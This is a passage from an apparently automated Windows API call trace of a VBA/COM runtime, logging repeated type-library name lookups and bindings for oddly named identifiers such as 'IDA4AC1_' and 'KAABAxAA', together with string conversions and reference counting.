ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8170e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="IDA4AC1_") returned 9 [0069.667] ITypeComp:RemoteBind (in: This=0x665bd30, szName="IDA4AC1_", lHashVal=0x10d1d1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.667] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IDA4AC1_") returned 0x10d1d1 [0069.667] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="IDA4AC1_" | out: _Dst="IDA4AC1_") returned 0x0 [0069.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="IDA4AC1_") returned 9 [0069.668] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.668] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="IDA4AC1_", lHashVal=0x10d1d1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.668] IUnknown:Release (This=0x665ba50) returned 0xd [0069.668] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.668] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="IDA4AC1_", lHashVal=0x10d1d1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.668] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.668] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.668] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="IDA4AC1_", lHashVal=0x10d1d1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.668] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.668] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.668] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="IDA4AC1_", lHashVal=0x10d1d1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.668] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8170e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="IDA4AC1_") returned 9 [0069.668] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="IDA4AC1_", lHashVal=0x10d1d1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.668] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.668] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8170e | out: _Dst=0x67c2d40) returned 0x0 [0069.669] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_IDA4AC1_") returned 0x10a95a [0069.669] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_IDA4AC1_" | out: _Dst="_B_var_IDA4AC1_") returned 0x0 [0069.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_IDA4AC1_") returned 16 [0069.669] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.669] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_IDA4AC1_", lHashVal=0x10a95a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.669] IUnknown:Release (This=0x665ba50) returned 0xd [0069.669] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.669] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_IDA4AC1_", lHashVal=0x10a95a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.669] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.669] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.669] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_IDA4AC1_", lHashVal=0x10a95a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.669] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.669] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.669] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_IDA4AC1_", lHashVal=0x10a95a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.669] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.669] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.669] IUnknown:Release (This=0x665ba50) returned 0xd [0069.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87097e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_IDA4AC1_") returned 16 [0069.669] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_IDA4AC1_", lHashVal=0x10a95a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0) returned 0x0 [0069.670] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8170e | out: _Dst=0x144ec0) returned 0x0 [0069.670] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KAABAxAA", lHashVal=0x1088ad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b816e2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="KAABAxAA") returned 9 [0069.670] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KAABAxAA", lHashVal=0x1088ad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b816e2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="KAABAxAA") returned 9 [0069.670] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KAABAxAA", lHashVal=0x1088ad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.670] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KAABAxAA") returned 0x1088ad [0069.670] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="KAABAxAA" | out: _Dst="KAABAxAA") returned 0x0 [0069.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="KAABAxAA") returned 9 [0069.670] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.670] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KAABAxAA", lHashVal=0x1088ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.670] IUnknown:Release (This=0x665ba50) returned 0xd [0069.670] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.670] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KAABAxAA", lHashVal=0x1088ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.670] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.670] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.670] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KAABAxAA", lHashVal=0x1088ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.670] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.670] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.671] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KAABAxAA", lHashVal=0x1088ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.671] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b816e2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="KAABAxAA") returned 9 [0069.671] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KAABAxAA", lHashVal=0x1088ad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.671] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.671] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b816e2 | out: _Dst=0x67c2d40) returned 0x0 [0069.671] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KAABAxAA") returned 0x106036 [0069.671] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_KAABAxAA" | out: _Dst="_B_var_KAABAxAA") returned 0x0 [0069.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_KAABAxAA") returned 16 [0069.671] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.671] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KAABAxAA", lHashVal=0x106036, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.671] IUnknown:Release (This=0x665ba50) returned 0xd [0069.671] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.671] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KAABAxAA", lHashVal=0x106036, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.671] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.671] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.671] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KAABAxAA", lHashVal=0x106036, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.671] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.671] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.671] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KAABAxAA", lHashVal=0x106036, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.671] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.671] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.671] IUnknown:Release (This=0x665ba50) returned 0xd [0069.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8709ae, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_KAABAxAA") returned 16 [0069.671] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KAABAxAA", lHashVal=0x106036, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41004200000000, pDummy=0x0) returned 0x0 [0069.672] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b816e2 | out: _Dst=0x144ec0) returned 0x0 [0069.672] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lQwAAA", lHashVal=0x10a5ce, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8173a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lQwAAA") returned 7 [0069.672] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lQwAAA", lHashVal=0x10a5ce, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8173a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lQwAAA") returned 7 [0069.672] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lQwAAA", lHashVal=0x10a5ce, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.672] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lQwAAA") returned 0x10a5ce [0069.672] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="lQwAAA" | out: _Dst="lQwAAA") returned 0x0 [0069.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="lQwAAA") returned 7 [0069.672] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.672] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lQwAAA", lHashVal=0x10a5ce, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.672] IUnknown:Release (This=0x665ba50) returned 0xd [0069.672] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.672] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lQwAAA", lHashVal=0x10a5ce, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.672] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.672] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.672] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lQwAAA", lHashVal=0x10a5ce, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.673] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.673] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.673] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lQwAAA", lHashVal=0x10a5ce, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.673] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8173a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lQwAAA") returned 7 [0069.673] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lQwAAA", lHashVal=0x10a5ce, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.673] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.673] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8173a | out: _Dst=0x67c2d40) returned 0x0 [0069.673] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lQwAAA") returned 0x102038 [0069.673] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_lQwAAA" | out: _Dst="_B_var_lQwAAA") returned 0x0 [0069.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_lQwAAA") returned 14 [0069.673] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.673] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lQwAAA", lHashVal=0x102038, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.673] IUnknown:Release (This=0x665ba50) returned 0xd [0069.673] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.673] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lQwAAA", lHashVal=0x102038, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.673] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.673] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.673] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lQwAAA", lHashVal=0x102038, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.673] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.673] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.673] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lQwAAA", lHashVal=0x102038, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.673] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.673] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.673] IUnknown:Release (This=0x665ba50) returned 0xd [0069.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8709de, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_lQwAAA") returned 14 [0069.674] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lQwAAA", lHashVal=0x102038, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.674] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8173a | out: _Dst=0x144ec0) returned 0x0 [0069.674] ITypeComp:RemoteBind (in: This=0x665ba60, szName="OXAAG4", lHashVal=0x10b0ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81762, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="OXAAG4") returned 7 [0069.674] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="OXAAG4", lHashVal=0x10b0ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81762, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="OXAAG4") returned 7 [0069.674] ITypeComp:RemoteBind (in: This=0x665bd30, szName="OXAAG4", lHashVal=0x10b0ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.674] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OXAAG4") returned 0x10b0ef [0069.674] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="OXAAG4" | out: _Dst="OXAAG4") returned 0x0 [0069.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="OXAAG4") returned 7 [0069.674] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.674] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="OXAAG4", lHashVal=0x10b0ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.674] IUnknown:Release (This=0x665ba50) returned 0xd [0069.674] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.674] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="OXAAG4", lHashVal=0x10b0ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.674] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.674] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.674] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="OXAAG4", lHashVal=0x10b0ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.674] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.674] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.674] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="OXAAG4", lHashVal=0x10b0ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.675] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81762, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="OXAAG4") returned 7 [0069.675] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="OXAAG4", lHashVal=0x10b0ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.675] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.675] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81762 | out: _Dst=0x67c2d40) returned 0x0 [0069.675] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_OXAAG4") returned 0x102b59 [0069.675] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_OXAAG4" | out: _Dst="_B_var_OXAAG4") returned 0x0 [0069.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_OXAAG4") returned 14 [0069.675] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.675] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_OXAAG4", lHashVal=0x102b59, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.675] IUnknown:Release (This=0x665ba50) returned 0xd [0069.675] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.675] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_OXAAG4", lHashVal=0x102b59, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.675] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.675] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.675] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_OXAAG4", lHashVal=0x102b59, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.675] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.675] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.675] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_OXAAG4", lHashVal=0x102b59, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.675] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.675] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.675] IUnknown:Release (This=0x665ba50) returned 0xd [0069.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870a0e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_OXAAG4") returned 14 